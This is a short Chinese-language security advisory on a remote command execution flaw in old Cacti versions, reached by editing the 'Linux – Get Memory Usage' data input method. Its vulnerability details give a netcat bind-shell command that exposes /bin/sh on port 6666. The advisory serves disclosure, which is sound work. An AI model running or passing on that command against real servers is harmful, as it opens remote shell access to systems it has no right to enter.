Cacti ‘Linux – Get Memory Usage’远程命令执行漏洞

漏洞起因
输入验证错误
 
影响系统
Planet Technology WSW-2401 0.8.6 h
Planet Technology WSW-2401 0.8.6 g
Cacti Cacti 0.8.7
Cacti Cacti 0.8.6 f
Cacti Cacti 0.8.6 c
Cacti Cacti 0.8.5 a
Cacti Cacti 0.8.5
Cacti Cacti 0.8.4
Cacti Cacti 0.8.3 a
Cacti Cacti 0.8.3
Cacti Cacti 0.8.2 a
Cacti Cacti 0.8.2
Cacti Cacti 0.8.1
Cacti Cacti 0.8
Cacti Cacti 0.8.7e
Cacti Cacti 0.8.7d
Cacti Cacti 0.8.7c
Cacti Cacti 0.8.7b
Cacti Cacti 0.8.7a
Cacti Cacti 0.8.6k
Cacti Cacti 0.8.6j
Cacti Cacti 0.8.6i
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限执行任意命令。
 
攻击所需条件
攻击者必须访问Cacti。
 
漏洞信息
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。
攻击者可以在"Linux – Get Memory Usage"功能中,更改"Data Input Method"来成功获得远程shell。设置"Input String"为"nohup nc -l -p 6666 -n -e /bin/sh &",可以以应用程序权限执行任意命令。
 
测试方法
 
厂商解决方案
目前没有详细解决方案提供:
http://cacti.net/
 
漏洞提供者
Moritz Naumann

发表评论?

0 条评论。

发表评论